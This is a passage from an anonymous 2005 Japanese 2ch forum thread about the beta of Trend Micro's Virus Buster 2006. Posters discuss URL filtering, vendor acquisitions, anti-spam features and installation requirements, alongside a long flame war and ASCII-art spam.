143 :名無しさん@お腹いっぱい。:2005/09/29(木) 23:54:56
>>141
うpしる。

144 :名無しさん@お腹いっぱい。:2005/09/30(金) 00:10:34
ただいまでつ。
ダウソしたものの、毎日遅くて、朝早くて、アンインスコ&インスコする暇がない。
あ、そろそろ寝なきゃ…。

145 :名無しさん@お腹いっぱい。:2005/09/30(金) 00:29:53
>>139
おいおまえ、顔真っ赤だぞ。

146 :名無しさん@お腹いっぱい。:2005/09/30(金) 00:46:02
URLフィルタのカテゴリーブロックをユーザーごとに設定できたらいいのにな・・

147 :名無しさん@お腹いっぱい。:2005/09/30(金) 00:51:23
蒸し返してるアホがおるな。

148 :名無しさん@お腹いっぱい。:2005/09/30(金) 00:57:24
>>131>>132
CheckPointて、ぞねを買収した会社か?

149 :名無しさん@お腹いっぱい。:2005/09/30(金) 03:02:17
131は単なるバカと認定されたがってる間抜け

150 :名無しさん@お腹いっぱい。:2005/09/30(金) 04:01:23
いつまでも粘着してるおまいらが
傍目にキモイんだが。

151 :名無しさん@お腹いっぱい。:2005/09/30(金) 09:28:30
>>150
痛い人再降臨(w

152 :名無しさん@お腹いっぱい。:2005/09/30(金) 11:14:16
暇人だね。あんた。>151

153 :131:2005/09/30(金) 12:07:21
>>135>>138>>149>>151
俺は事実に基づいて書いてるし。
2006のベータテストでも、吸収した新技術を活かしてる事ははっきり分かる。
対するマカフィーやシマンテックが、吸収リソースを活かせていないのは、ITジャーナリズムでよく指摘されていること。

偏ってる云々も、反感云々も、バカ云々も、痛い云々も、全て感情論だな。
書き方にケチは付けられるが、肝心の中身を検証する能力はない。
具体性のある反論は一つもない。

お前等の頭のレベルを証明してるんだよw
まともなレスひとつ書けないくせに、中傷能力だけは持っているようだw


154 :131:2005/09/30(金) 12:08:31
>>148
ZoneLabsを傘下におさめたのは
かなーり昔じゃなかったけ?


155 :名無しさん@お腹いっぱい。:2005/09/30(金) 12:44:00
McAfeeはDeefsoftの買収前にNovaSoftという企業から
別のアンチスパムソフト「SpamKiller」も取得していた。
McAfeeが2つの主要スパムソリューションを手に入れたことで、同社はライバルのSymantec、およびその最新のNorton製品「AntiSpam 2004」に対して
明らかな優位性を持っているように思えるかもしれない。

しかしそれは間違いだ。

何らかの理由により、McAfeeはSpamAssassinの最も優れた部分を取り除き、SpamKillerの最も面倒な部分をそのまま残してしまった。
例えばSpamAssassinはOutlookと完全に統合し、1カ所でスパム削除機能を使うことができた。
これに対し「SpamKiller 5.0」はOutlook内にツールバーを提供するだけで、
新たなスパムの遮断やスパムと誤認されたメールを分類し直すには別のアプリケーションが必要だ。

156 :名無しさん@お腹いっぱい。:2005/09/30(金) 12:53:09
URLフィルタでいちいち専用サーバーにアクセスするのが嫌だ。
監視されてるみたいでさぁ。
プライバシー漏れないのか?

157 :名無しさん@お腹いっぱい。:2005/09/30(金) 23:10:32
>>156
使わなきゃいーじゃん。
URLフィルターソフトは、そのほとんどが独自データベースにアクセスするんだから、会社を信用するか、できないなら使用を辞めればよい。
それがエンドユーザーの権利。

158 :名無しさん@お腹いっぱい。:2005/10/01(土) 00:04:37
>>153
バスター2006の性能向上はベータテストによる実体験に基づいて客観的に評価しているのに、
マカフィーやシマンテック製のアンチウイルスに対しては「ITジャーナリズム」の指摘のみに
基づいて評価するんですね。

なんか、後半で言ってることが「天に唾吐く」状態になってませんか

159 :名無しさん@お腹いっぱい。:2005/10/01(土) 01:01:58
やっぱり『社員乙』だったな。

160 :131:2005/10/01(土) 01:16:07
>>158
厳密な性能テストの話じゃあるまいし、なにを大袈裟なことと言ってるの?
実体験かどうかに関わりなく、その機能を客観的に比較検証できるデータがあれば十分だろう。
細かい使い勝手などは体験が前提になるが、様々なリソースを活かしているかどうかは、ある程度の資料で分かること。

そもそもITジャーナリズムでよく指摘されることが全く説得力がないなら、何一つ価値がないものになってしまうし、
バスター2006のベータにはたまたま参加できたが、これは大前提ではない。
他の手段でも必要な情報が入手できれば、十分な比較検証は出来る。

そもそも「ITジャーナリズムのみの指摘」って勝手に決め付ける根拠は?
最新のノートンやマカフィー製品は試していないが、所謂買収劇で入手し、投下した新技術を含む製品は私も使ってきた。
元のベンダーの製品との直接的な比較は無理でも、他のユーザーの意見と一緒に検討は出来る。



161 :131:2005/10/01(土) 01:26:01
(続き)
というか、今回もまた>>131>>132>>153に対する反論になっていないだろw
「貴方の主張はここが間違っている」という意見は一個も見当たらない。
いい加減にしろよ。

書き方がどーのこーの、検証姿勢がどーのこーのという、一介の2chユーザーの姿勢にイチャモン付けてるだけ。
内容に対する直接的な反論・反証になっていないのに、中身のない粘着レスを執拗に入れ続けるお前等の姿勢こそ問題であり、検証に値しない。
何度言わせれば分かるんだか、低脳。


162 :名無しさん@お腹いっぱい。:2005/10/01(土) 02:11:23
まぁなんにしても、俺もついに 2006 入れちゃったよ。
みんなが言うほどは、重くないけどなぁ。
土日使って見て、アンケートに答えようかな。

163 :名無しさん@お腹いっぱい。:2005/10/01(土) 06:32:52
>>161
あなたの主張が間違っているだなんて、誰も一言も言っていませんよ。
むしろ、それなりに造詣が深い事は分かります。
ただ言えるのは、あなたには、人に意図を伝える能力が乏しい、ということだけです。
同じことを伝えるにも、表現一つで共感を得られるか得られないかが大きく変わりますよね。

たぶん、いや、気を悪くしないでね、あなたはどこかのITベンダーのSEか何かじゃない?
であれば、顧客から相手にされないだろうから、一生底辺でSEやってるといいよ。
違ったらゴメンね。

>>162
ちなみに、アンケートの提出期限は9/29までだったような・・・w

164 :名無しさん@お腹いっぱい。:2005/10/01(土) 09:49:48
>>163
このスレROMってる時は、俺もそう思っていたんだけど、ダウンロード時のタイミングで締め切りが変わるみたい。

俺の場合は一昨日あたりアンケートお願いメールが来て、今週まででしたとさ。

165 :名無しさん@お腹いっぱい。:2005/10/01(土) 09:53:35
>>164
追記ですけど、期限もメーカーサイトには11末ってあったけど、俺のVB2006の画面には12末までになってるなぁ。
ベータ版入れてない人、今からでもまだ間に合うかもよ!

…なんて書くと、社員乙とか書かれるんだろうな。
でも社員なら、ベータ版サイトに堂々と情報載せるっつーの。

166 :名無しさん@お腹いっぱい。:2005/10/01(土) 12:26:42
>>165
有効期限は90日後で計算すると、ちょうど日にちが合うので、そういうことじゃない?

しかし、その日にちは90日限定版のプログラムをそのまま流用したからと思う(たんに表示されてるだけ
実際の期限は10月末だと思った。
ダウソページに10月末でいっさいのうpでとできなくなりますって書いてあったと記憶する。
20日以降は本製品入れたほうがいいでしょ。
ベータ版と製品版が同一プログラムという確証はないわけで・・・
ベータテストやその後の検証で細部が変更されている可能性はある。むしろあったほうがいいだろう。

ベータ版をアップグレードで有効シリアル入力すると、どうなるのかな?
そのまま使えるのか?

167 :131:2005/10/01(土) 12:27:51
>>163
だから何?って話だな。
2chでわざわざ人に伝える能力のことを指摘してどうすんのか?w
ここは人間関係教室かよw
ならば社員乙だの必死だなwだの2chでよく見かける煽りを入れてるヤシの方こそ問題があることになる。
お前も同じだよ。
検証の前提さえ間違っているのだからな。
>>160の指摘はスルーかよ?w

おまいの間違った思い込みと曲解こそ問題で、それは俺の伝達能力だけの問題ではない。
何故ならおまいの価値観や基準を一方的に押し付けているからだ。

ベータテストに参加するか否かに関係なく、既にプレスリリースされた2006の機能の資料や
マスコミ報道・そして他のベータテスターのリポートを見るだけでも、
今まで 「オマケ機能に過ぎない」と揶揄された部分が、「使える機能」に進化していることが容易に見て取れる。


168 :166:2005/10/01(土) 12:28:04
あ、つーことで、おれのの期限は16日になってるから
期限日はひとそれぞれかと

169 :131:2005/10/01(土) 12:30:13
>あなたはどこかのITベンダーのSEか何かじゃない?

はあ?

>顧客から相手にされないだろうから、一生底辺でSEやってるといいよ。

こんな下らない誹謗中傷に転じるヤシが、俺の伝達能力を問題にしたり、「天に唾吐く」と言ってるのが笑える。
おまいらの指摘は、全部おまいらに当てはまるし、そこに気付いてないのが痛い。


170 :名無しさん@お腹いっぱい。:2005/10/01(土) 12:41:05
はいはいわろすわろす

171 :131:2005/10/01(土) 12:50:07
・・と、こういうレス>>170を入れることで、
ますます>>169>>161>>167が証明されるわけだなw
中身で反論できないと、電波に早変わりしてしまう低脳。

172 :名無しさん@お腹いっぱい。:2005/10/01(土) 12:55:57
トレンド信者を装った雑音か?

173 :名無しさん@お腹いっぱい。:2005/10/01(土) 13:32:54
勝手に証明してたらいいやん。
相手にしてないだけじゃないの。

174 :131:2005/10/01(土) 13:52:52
社員の次はSE。
SEの次は雑音。
こいつらの連想力の貧しさこそ、最大のセキュリティーホールといえる。

>相手にしてないだけじゃないの。

いや。さんざん相手にされてしまい、しつこく絡まれるから困ってるわけだが。
過去レスも読めない馬鹿ですか?



175 :131:2005/10/01(土) 14:11:03
PFW、スパイウェア対策、迷惑メール対策機能は、ウイルス対策に特化していた企業の基礎技術力の無さが原因で、
オマケ機能に過ぎなかった。
ここにきて、専門企業の買収で、ようやく使えるようになって来た。

だが、登録キーワードの送信をブロックする個人情報保護機能はまだ駄目だな。
以前、サポートに要望を出したら、「その意見を開発に回します」の一言だけで、実に素っ気ない返事。
主要なブラウザ、メーラー、メッセンジャーを通じて、ユーザーが自主的(能動的)に入力・送信するキーワードはブロックしてくれる。
だが、バックグラウンドで勝手に各アプリが自動送信する(ユーザーの自覚が無い)キーワードはスルーしてしまう。

今後もこの部分は、他のツールに頼るしかなさそうだ。
やれやれ・・・。


176 :名無しさん@お腹いっぱい。:2005/10/01(土) 16:21:10
何ですかこのチラシの裏はwww

177 :名無しさん@お腹いっぱい。:2005/10/01(土) 16:38:09
あのね、ここに限らず、ネットで議論なんて無理なんですよ。
疲れるだけです。
ニュース速報板に行ったことはありますか?
疲れますよ。あそこは。
議論を通して何か得るものがあれば良いのですが、疲労という、一銭の金にもならないし
人生のためにもならないものが増えるだけです。

178 :名無しさん@お腹いっぱい。:2005/10/01(土) 16:39:57

(-_-).。oO(ネムイ・・・)

179 :名無しさん@お腹いっぱい。:2005/10/01(土) 16:40:19
そもそも多くの場合議論ではなくて感情的な煽り合いになりますからね。
余計なギャラリーの野次も煩いですし。

180 :名無しさん@お腹いっぱい。:2005/10/01(土) 18:23:17
議論しようにも匿名なので無責任発言だらけじゃないか。

181 :131:2005/10/01(土) 18:33:03
>>177>>179
社員の次はSE。
SEの次は雑音。
雑音の次は議論云々?
どんどん壊れてるぞ、お前らw

俺は議論も説教も求めていないのに、おまえらが絡んできたんじゃねーかw
馬鹿?
つか、ここのスレは議論の是非を論じる場じゃないのに、
なにをピント外れの説教してんの?


182 :名無しさん@お腹いっぱい。:2005/10/01(土) 19:35:12
>>131氏 自分は貴方の表現が意図を十分伝えていると思う。
ただ煽りに反応するとせっかくの良い書き込みが薄まっていくと思う。
煽りに煽りで反応していくと段々と斜め読みしかされなくなるかも。


183 :名無しさん@お腹いっぱい。:2005/10/01(土) 20:36:00
なにこの荒らし
うるさいから消えてくんない?

184 :名無しさん@お腹いっぱい。:2005/10/01(土) 20:40:46
で、みなさん、β版使ってどうよ?

2005から大きく機能アップしたものってある?

185 :名無しさん@お腹いっぱい。:2005/10/01(土) 20:46:49
                      ''';;';';;'';;;,.,                  ザッ
                       ''';;';'';';''';;'';;;,.,   ザッ
          ザッ            ;;''';;';'';';';;;'';;'';;;
                        ;;'';';';;'';;';'';';';;;'';;'';;;
                        vymyvwymyvymyvy     ザッ
               ザッ     MVvvMvyvMVvvMvyvMVvv、
                   Λ_ヘ^−^Λ_ヘ^−^Λ_ヘ^Λ_ヘ
     ザッ            ヘ__Λ ヘ__Λ ヘ__Λ ヘ__Λ
                __,/ヽ_ /ヽ__,.ヘ /ヽ__,.ヘ _,.ヘ ,.ヘ    ザッ
    /\___/ヽ   /\___ /\___/ヽ _/ヽ /\___/ヽ
   /''''''   '''''':::::::\/''''''   '''/''''''   '''''':::::::\   /''''''   '''''':::::::\
  . |(●),   、(●)、.:|(●),    |(●),   、(●)、.:|、( |(●),   、(●)、.:|
  |   ,,ノ(、_, )ヽ、,, .::::|   ,,ノ(、_, )|   ,,ノ(、_, )ヽ、,, .::::|_, )|   ,,ノ(、_, )ヽ、,, .::::|
.   |   `-=ニ=- ' .:::::::|   `-=ニ= |   `-=ニ=- ' .:::::::|ニ=|   `-=ニ=- ' .:::::::|
   \  `ニニ´  .:::::/\  `ニニ \  `ニニ´  .:::::/ニ´ \  `ニニ´  .:::::/
   /`ー‐--‐‐―´\ /`ー‐-  /`ー‐--‐‐―´\-‐‐ /`ー‐--‐‐―´
「vipから来ますた」「vipから来ますた」「vipから来ますた」「vipから来ますた」

186 :名無しさん@お腹いっぱい。:2005/10/01(土) 20:47:57
 *     +    巛 ヽ
            〒 !   +    。     +    。     *     。
      +    。  |  |
   *     +   / /   イヤッッホォォォオオォオウ!
       ∧_∧ / /
      (´∀` / / +    。     +    。   *     。
      ,-     f
      / ュヘ    | *     +    。     +   。 +        
     〈_} )   |                                VIPクオリティ!!
        /    ! +    。     +    +     *         http://ex11.2ch.net/news4vip/
       ./  ,ヘ  |
 ガタン ||| j  / |  | |||
―――――――――――― 

187 :名無しさん@お腹いっぱい。:2005/10/01(土) 20:51:12
>>183
あんたがうるさいから消えるべきだと思う。

188 :五月蝿い奴:2005/10/01(土) 20:55:48
反応する人も、「自分は五月蝿い」ということを認識しろ。
あ、このレスには返信するなよ。
五月蝿くなるだけだからな。
馬鹿なお前らにわざわざ俺が「五月蝿い奴」になって教えてやっているんだからな。

189 :名無しさん@お腹いっぱい。:2005/10/01(土) 20:58:01
                 *     +    巛 ヽ
                            〒 !   +
┏━━┓             *     +   / /  イヤッッホォォォオオォオウ!
┗┓┏┻━┳━━┳┳┳┓     ∧_∧ / /
  ┃┃ ━ ┣━  ┃    ┃    (´∀` / / +    。
  ┃┃  ━┫━  ┃┃┃┃    ,-     f
  ┗┻━┳┻━╋┻┻╋┫    / ュヘ    | *     +
        ┃┏┓┣━━┫┗━┓〈_} )   |
        ┣┻┛┃┏━┫┏┓┃   /    ! +    。
        ┃  ━┫┗━┫┃┃┃  ./  ,ヘ  |
        ┗━━┻┳━╋┫┗┛||| j  / |  | ||| ガタン
                ┃  ┃┣━━┳┳┳┳━━┳┓┏┳┳━━┓
                ┃    ┃ ━ ┃┃┃┃  ━┫┣┛┃┃ ━ ┃
                ┃┃  ┃  ━┫    ┣━  ┃┃┏┫┃┏━┛
                ┗┻━┻━━┻┻┻┻━━┻━┛┗┻┛

190 :名無しさん@お腹いっぱい。:2005/10/01(土) 20:58:20
罵り合いについての意見

  ァ  ∧_∧ ァ,、
 ,、'` ( ´∀`) ,、'`
  '`  ( ⊃ ⊂)  '`


>>184
そこそこ大きく機能アップしたと思う。
2004から2005より、2005から2006のほうが差が大きいと思う。
2005年に脅威を増した問題のフィッシング詐欺や、ゴークルみたいなタイプミスでウイルス感染するなどから
URLを監視するってのがセキュリティーソフトの流れになると思えば、多少思いのも仕方ないかと思う。

191 :190:2005/10/01(土) 21:00:10
>>190
多少重いのも仕方ない、の誤変換ミス。

それとageてスマン。

192 :名無しさん@お腹いっぱい。:2005/10/01(土) 21:04:22
重いアンチウィルスソフトはいらね

193 :131:2005/10/01(土) 21:11:44
>>182
つーか、最初のカキコの時点で、斜め読みされてたしw
以前、2005の過去スレッドで同様の見解を出したときは、普通の人が集まっていたようで、社員がどうのこうのの煽りもなく、むしろ同意の意見があった。

194 :131:2005/10/01(土) 21:12:46
要するにタイミングの問題でもある。
馬鹿が居るときは、普通の意見でも、「偏った意見」だの「社員乙」にされるだけ。

伝達能力にケチを付けられて、それを反論すると、
>「ITジャーナリズム」の指摘のみに基づいて評価するんですね。
という勘違い間抜けカキコ。
そこに再反論すると、またまた伝達能力がどーしたこーした、底辺でSEやってろだの、馬鹿丸出し。
また再反論すると、「相手にされてない」という読解力の欠片も無い妄想。

挙句の果ては、「ネットで議論なんて無理」という、元々議論なんか求めていない俺に向かって勘違いの爆発。
結局、中身を反証できたヤシは一人もいない。
ならば黙ってればいいのに、本題から離れて、あの手この手で絡んでくるわけだな。
蛇の執念だよ。粘着にしてもキモ過ぎる。


195 :名無しさん@お腹いっぱい。:2005/10/01(土) 21:13:19
   〃∩ ∧_∧
   ⊂⌒(  ・ω・)
     `ヽ_っ⌒/⌒c
        ⌒ ⌒
     ..,,,、                 ,,,、                
 'llii,  .゙!llii,,,、 .llii,、 .,iil゙゙lii,,  .゙lii,,  ゙゙llli,,,_ .llii,,  ,iil゙゙liii,
 ,lllll!,,liiilllllllll゙!l‐ ,llllli、,illl` lllli, .,lllll:,,liiilllllllll゙!l‐ ,llllli、,illl` lllli,
 llll!,il ,,,,,,llllll  .llllll .illll` .llllll lllll゙,l",,,,,,lllll:   ,lllll",lllll .llllll:
 llllllllillllllllllllllii, .!llll,,illl!ll,,,lllllll llllllllillllllllllllllii,、.゙llll,,illl!ll,,,,llllll:
 .゙!!!゙゙゙!!!!!!!゙゙゙!゙  .゙゙゙゙゙゙゜ ゙゙゙!!゙゙  ゙゙!!l ゙゙!!!!!!゙゙゙!゙゜ .゙゙゙゙゙゙` ゙゙゙!!゙
         ,,,、            _,,,,、     .,,,,,           
         '!llli, ,,,,,,,,,,,、  ,,,,,iiillll!!lllii,  ,,,,,,,,,,,llllliiiiiiii,,
        ,,,,illllllll!゙゙~゙!llli,  .゙゙゙゙,lliilllllll゙° .゙゙゙!!!!llllllll「 ゙
        .゙゙llllllll`  .,lllll| ,,iilllllll!!!!!!lllii、  ,illl゙llllllli、
        ,illlllllll,,,,,,,iilllll!" '!!l!l゙°,,,,illlllll:   ゙゙!!lllllllll
        ゙゙゙゙゙!!!゙゙゙!!!!!゙゙゜   ''lll!!!!!!!!゙゙’  ゙゙l!!!!!!!゙゜
               ,,,、            _,,,,、     .,,,,,
               '!llli, ,,,,,,,,,,,、  ,,,,,iiillll!!lllii,  ,,,,,,,,,,,llllliiiiiiii,,
              ,,,,illllllll!゙゙~゙!llli,  .゙゙゙゙,lliilllllll゙° .゙゙゙!!!!llllllll「 ゙
                 ゙゙llllllll`  .,lllll| ,,iilllllll!!!!!!lllii、  ,illl゙llllllli、
              ,illlllllll,,,,,,,iilllll!" '!!l!l゙°,,,,illlllll:   ゙゙!!lllllllll
              ゙゙゙゙゙!!!゙゙゙!!!!!゙゙゜   ''lll!!!!!!!!゙゙’  ゙゙l!!!!!!!゙

196 :131:2005/10/01(土) 21:15:43
>>184
機能が多けりゃ良いと思ってる厨には、まだまだ満足いくレベルじゃないだろうな。
ただ、セキュリティの観点からは、十分役立つものに進化したと思うね。
重い・軽いは別として、使える機能がようやく揃った印象。


197 :名無しさん@お腹いっぱい。:2005/10/01(土) 21:33:27
>>196
kwsk

198 :131:2005/10/01(土) 21:39:37
>>156>>157
ソフトウェア内部のURLデータをベースにするものと、専用サーバでデータ照合する2種類のタイプがあるわけだが、
有名な「Iフィルター」というソフトは、どちらのシステムだったかな・・・。

どちらの手法にも長所と短所がある。
最近は無料でURLフィルタリングするサービスを提供するプロバイダが増えている。
これが最も効率的かもしれない。

どんなに足掻いても、契約プロバイダには必ずアクセスしなけゃならないし、その目は誤魔化せない。


199 :131:2005/10/01(土) 21:57:03
>>175でサポートに出した要望は、他にもあった。
2005のインストール条件に、IE6のSP1があったが、SP1を発表する前に販売されたXP・およびXP搭載PCを買ったヤシは、OS再インスコ時に、素のXP&IEに戻ってしまう。

このままではバスターがインスコできないため、先ずWindows UpdateでセキュリティパッチやSPを導入する必要がある。
その最中にワームに感染したら、どうすんのかと。
素のXPではPFWがデフォで有効じゃないし、PFWの存在を知らない初心者もいるだろう。
ブロードバンド・ルータを使ってないユーザーもいるだろう。

OSリカバリーする前に、SPやパッチをCDとかに保存しとけばいいけど、そこまで頭が回らないユーザーも多いだろうと。
だから、インスコ条件を緩和してくれと要望した。
2006で改善された。


200 :131:2005/10/01(土) 21:57:36
俺一人の意見だけでトレンドが動くとは思えないから、他にも同様の要望を出した人がいるんだろうな。
でもこんなことはユーザーが言わなくても、ベンダー側が真っ先に気付くべきかと。
セキュリティ企業だろうに。

201 :名無しさん@お腹いっぱい。:2005/10/02(日) 00:18:09
>>198
iフィルターは専用鯖です。
人が目で見て1件ずつ登録している地道なシステムです。

俺はVB2006のURLフィルタを使うことにしたので、iフィルターは解約したけど…。
不都合があればまたiフィルターに戻るつもり。

202 :名無しさん@お腹いっぱい。:2005/10/02(日) 00:30:51
IE6.0とIE5.5の間に機能的な違いなんて、あるの?
インスコチェック時の条件チェックリストをIE5.5に書き換えただけじゃないの?
一世代前の動作環境にしとくべき。
OS・CPU・メモリ・HDD・ビデオは化石レベルなのに、IEだけ最新を求めるなんて訳ワカメ

もう2007からはMe以前を切っていいんじゃないか?ビスタも出てるだろうしね。
切らないと64bitには対応出来んだろうね。
Me以前のOSでバスター使いたいやつは前のバージョン入れれば済むわけで。

203 :名無しさん@お腹いっぱい。:2005/10/02(日) 00:42:45
それでもいつかはサポート期限過ぎちゃうしぃ〜。

204 :名無しさん@お腹いっぱい。:2005/10/02(日) 00:44:31
>>202
一つのバージョンのサポート期間が長めのノートンなら9x系を切ってもいいかもしれないけど、
バスターは、次期バージョンのアップデートが無料な代わりに一つのバージョンのサポートが2年と短いから、
9x系の切捨ては慎重にやるべきだと思う。

205 :131:2005/10/02(日) 01:40:42
>>201
情報サンクス。
ま、ベンダーが用意する禁止リストだけでは、個々のユーザーの必要性に一致しない面もあるから、
個別に禁止URLを登録する必要性も出てくるね。
だから外部鯖との併用になるわけだが・・・。

俺はブロードバンド・ルータのURLフィルタを利用してる。
OSを再インスコしても、バスターがバージョンアップしても、無関係にデータが残り続けるから。


206 :131:2005/10/02(日) 01:44:20
>>202
まあ、いずれ古いOSとブラウザを切り捨てる時は来るだろうけど、
バスター2005では、まだ「現役」のブラウザであるIE6に対してまで、SP1適用を条件にしていたわけで・・・。
しかも2005の発売は昨年の秋だし、いくらなんでも早過ぎだと思ったわけだ。

2006で条件を緩和したのは一応評価できると思った。


207 :名無しさん@お腹いっぱい。:2005/10/02(日) 02:13:57
俺もVB2003の頃ルーター買わなきゃと悩んでいたのだが、気がつくといつの間にかVB2006だとよ。

俺の使い方だと、ルーターなくとも問題なしという結果が出てるわけだな。

208 :名無しさん@お腹いっぱい。:2005/10/02(日) 02:27:46
>>206
2005のインストーラーはIE6.0SP1までは要求してなかったと思うよ。
条件は、98/MeならIE6.0を入れていること、Windows2000ならSP4を入れてること、
XPは最初からIE6.0だから特になし。サポートのページかどこかで昔見た気がする。

OSリカバリー時に先にバスターをインストールしてからWindows Updateできるように
というのは確かに同意。それはそれとして、IEの脆弱性を考えると現時点での最新版
を推奨するというのはセキュリティ対策として筋が通ってると思う。

209 :名無しさん@お腹いっぱい。:2005/10/02(日) 02:31:45
>>203-204
そのバージョンだけを特例的に3年とかにしてもいいと思う。
マイクロソフトによるWindows 9X系の完全サポート切れに伴い
ウイルスバスターのみでセキュリティーを維持することが難しくなったため。と理由をこじつけてもいいと思う。
サポート期限延長しても収入は減らないバスタークラブという仕組みが、ものを言う時だぞ。
9X切ると、検索スピードアップ、重さ改善、とかならないかと期待してるんだけど・・・
ほとんどのうpでとファイルはバージョン違いも共通でイケル?と思うけど、違うのか?
その延長サポート期間過ぎてもバスター使いたいやつは「そんなあなたにソフト」にさよならだ。グッバイ、ジョジョ、グッバイ、野村義男
バンドブームなのに売れなry

210 :131:2005/10/02(日) 03:08:34
>>208
>2005のインストーラーはIE6.0SP1までは要求してなかったと思うよ。

いや。要求している。
http://www.trendmicro.com/jp/about/news/pr/archive/2004/news040909.htm


211 :131:2005/10/02(日) 03:22:36
既に>>199で説明済みなので、別の面から補足しておく。

バスター2005では予約自動タスクの 「セキュリティ診断」機能があるため、
インスコ時の条件を厳しくする必要は無かった。


212 :名無しさん@お腹いっぱい。:2005/10/02(日) 03:50:31
インスコ時にハネられる時。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=10699
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=10698

213 :名無しさん@お腹いっぱい。:2005/10/03(月) 22:22:07
ジエンの臭いがプンプンするスレだな

214 :名無しさん@お腹いっぱい。:2005/10/03(月) 22:33:16
クソうるせー奴も消えたようだな
やっとスレに平和が戻った

215 :名無しさん@お腹いっぱい。:2005/10/04(火) 12:23:14
2006ベータの情報はないの?
無駄にスレが消費されてるね。

216 :名無しさん@お腹いっぱい。:2005/10/04(火) 14:13:57
可もなく不可もなく、って感じかな。
良くも悪くも、ハデな機能もダメな機能もない。
各種設定画面にすぐに飛べるショートカット機能が欲しいくらいかな。
(タスクトレイの右クリックメニューでもいいのだけれど…)

217 :名無しさん@お腹いっぱい。:2005/10/04(火) 16:23:33
>>215
過去レス嫁。

218 :名無しさん@お腹いっぱい。:2005/10/04(火) 16:29:59
>>213
私は自演してないよ。
耳鼻科に逝けば?
>>214
アンタが煽り犯でスレを混乱させてたんじゃないの?

219 :名無しさん@お腹いっぱい。:2005/10/04(火) 16:38:30
>>218
バカ?
・・・いや、失礼した。君はバカだ。
しかも読解力が著しく低いようだ。

220 :名無しさん@お腹いっぱい。:2005/10/04(火) 16:40:01
ひゃっほ〜!!!!
新たな火種現る!!!!
その名も>>218!!!!!!!!!!!!

さあ!!今夜も派手に煽りあってスレを潰そうぜ!!!!!!!!!!!!!

221 :名無しさん@お腹いっぱい。:2005/10/04(火) 17:36:03
ところで、トゥルー・コーリングがおもしろくね?

222 :名無しさん@お腹いっぱい。:2005/10/04(火) 18:24:39
>>220

223 :名無しさん@お腹いっぱい。:2005/10/04(火) 18:31:23
219は耳鼻科の意味が解らなかったと思われ。

224 :名無しさん@お腹いっぱい。:2005/10/04(火) 18:42:05
そもそも>>218に対して誰も「お前が自演してたんだろwwwwww」とか
書いてないんだけども、なぜか>>218が一人で怒り出したわけで。
どう見ても変な奴だろう。

225 :名無しさん@お腹いっぱい。:2005/10/04(火) 19:02:59
>224
名指ししなくても、ジエンとか言い出す限り
直前に会話してた人達を指してると思われて当然かと。

つか、なんでムキになってんだろ?この人w

226 :名無しさん@お腹いっぱい。:2005/10/04(火) 19:08:22
それにしたって、「耳鼻科に逝けば?」は余計だな。
必死すぎwwwwwww

227 :名無しさん@お腹いっぱい。:2005/10/04(火) 19:15:27
>>226
君が必死に見えるんだけど。wをいっぱい付けて。
てゆうか、誰と誰誰とのレスを自演と感じたのか、
アンカー書いてごらん。

228 :226:2005/10/04(火) 19:19:23
>>227
あっはっはっは
面白いね。君も。
I'm not 213.

229 :名無しさん@お腹いっぱい。:2005/10/04(火) 19:20:23
誰が誰だかわからないのが良いね。
くっくっく。。。

230 :名無しさん@お腹いっぱい。:2005/10/04(火) 19:23:24
213と226ってすぐ反応するんだね。
張り付いてて純粋に痛い。


231 :名無しさん@お腹いっぱい。:2005/10/04(火) 19:29:24
ワザワザ蒸し返した>>213>>214
今回の癌細胞だったってことでFA?

232 :名無しさん@お腹いっぱい。:2005/10/04(火) 19:32:37
First Answer

233 :名無しさん@お腹いっぱい。:2005/10/04(火) 21:45:48
このスレの情報はあなたにとって役に立ちましたか?

 ○ 非常に役にたった
 ○ 役にたった
 ○ どちらともいえない
 ○ 役に立たなかった
 ● 全く役にたたなかった


234 :名無しさん@お腹いっぱい。:2005/10/04(火) 21:48:59
このスレの情報はあなたにとって役に立ちましたか?

 ○ 非常に役にたった
 ○ 役にたった
 ○ どちらともいえない
 ○ 役に立たなかった
 ○ 全く役にたたなかった
 ● ちんぽっぽ

 ∧ ∧
(*‘ω‘ *)  ちんぽっぽ
 (   )
  v v

   川
 ( (  ) )

235 :名無しさん@お腹いっぱい。:2005/10/04(火) 21:52:18
ちょ・・ちょっと待った!!!
ライフライン。


・・・オーディエンスで。

236 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:05:01
>>233-234
ベータ版のスレなんぞ大して役立つ筈がなかろう。
荒らしはキエロ。

237 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:06:46
131乙

238 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:08:01
>>236
 ∧ ∧
(*‘ω‘ *)  ちんぽっぽ
 (   )
  v v

   川
 ( (  ) )

239 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:15:40
行儀わるいガキに食いつぶされたね。ここ。

>>231
禿げしく同意。

240 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:21:40
そもそも社員乙発言にキレたどこかのとても頭の良いお方が必死過ぎたんですよ
軽く受け流せなければまだ修行が足りないと認識すべきなんですよ
一晩寝たら忘れられるようじゃないとね。難しいけど。

241 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:25:31
出た。
読点を入れないヤシの自演レス。
キャラが豊富だねぇw

242 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:30:07
責任の擦り付け合いウザ。
テメェの駄レスを帳消しにしたがる性格だろう。
修行が足りない。
>>213>>214>>240とかね。

243 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:30:27
いや。キャラが豊富とかどうでも良いんですよ
問題は、>>241さん。あなたがどう思っているかなんですよ。
何も意見が無いのなら偉そうな事は書かないで下さいね。

もう一度問います。あなたはどうなんですか?

244 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:32:48
蒸し返してる>>213>>214>>240の修行不足はよーく解ったから
消えてくれよ。

245 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:33:23
>>228
笑ってごまかさないで
アンカー書いてごらん。

246 :”管理”サイドだったらIPアドレス見れるのかね?:2005/10/04(火) 22:45:11
http://pc8.2ch.net/test/read.cgi/sec/1128089990/15

15 名前:名無しさん@お腹いっぱい。[] 投稿日:2005/10/04(火) 22:37:00
くっくっく。。。
ネタは提供した。
あとはバカなお前らで盛り上げてくれ。
せっかく汚れ役を買って諭してもその程度だもんな。

247 :131:2005/10/04(火) 22:48:06
>>197
読み落としていた。
kwsk = 詳しく。

